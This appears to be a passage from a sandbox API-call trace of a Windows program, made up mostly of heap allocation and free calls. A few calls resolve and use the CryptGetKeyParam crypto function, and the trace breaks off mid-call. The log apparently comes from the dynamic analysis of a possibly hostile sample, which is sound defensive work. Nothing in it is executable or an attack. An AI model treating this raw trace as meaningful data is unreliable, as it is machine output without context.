[0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0161.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0161.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0161.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0161.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.657] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0161.657] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c28d8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28d8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0161.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0161.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.658] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0161.659] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0161.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.659] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.659] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.660] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.660] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.660] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.660] PeekMessageW (in: 